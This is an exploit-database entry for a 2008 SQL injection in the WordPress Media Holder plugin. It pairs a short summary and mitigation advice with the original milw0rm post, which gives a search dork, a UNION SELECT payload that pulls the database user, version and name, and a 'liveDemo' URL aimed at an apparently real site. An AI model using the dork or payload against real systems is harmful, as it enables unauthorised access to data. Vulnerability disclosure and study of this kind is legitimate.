WordPress Media Holder (id) Sql injetion vulnerability!

vendor:

Media Holder

by:

boom3rang

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Media Holder

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

WordPress Media Holder (id) Sql injetion vulnerability!

A SQL injection vulnerability exists in WordPress Media Holder (id) which allows an attacker to execute arbitrary SQL commands on the underlying database. This is due to the application failing to properly sanitize user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request containing SQL commands to the vulnerable application. Successful exploitation could result in the execution of arbitrary SQL commands on the underlying database, allowing an attacker to access or modify sensitive data.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in an SQL query. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

-------------------------------------------------------------------
WordPress Media Holder (id) Sql injetion vulnerability!
-------------------------------------------------------------------
-------------------------------------------------------------------
Author: boom3rang
Greetz: H!tM@N - KHG - chs - redc00de!
Site   :  www.khg-crew.ws - [Kosova Hackers Group!]
-------------------------------------------------------------------


-------------------------------------------------------------------
Dork:         mediaHolder.php?id
-------------------------------------------------------------------
Exp:          http://localHost/mediaHolder.php?id=[exploit]
-------------------------------------------------------------------
exploit:      -9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------
liveDemo:
http://www.dhadm.com/mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------


-------------------------------------------------------------------
Proud 2 be Albanian
Proud 2 be Muslim
United States of Albania
-------------------------------------------------------------------

# milw0rm.com [2008-10-26]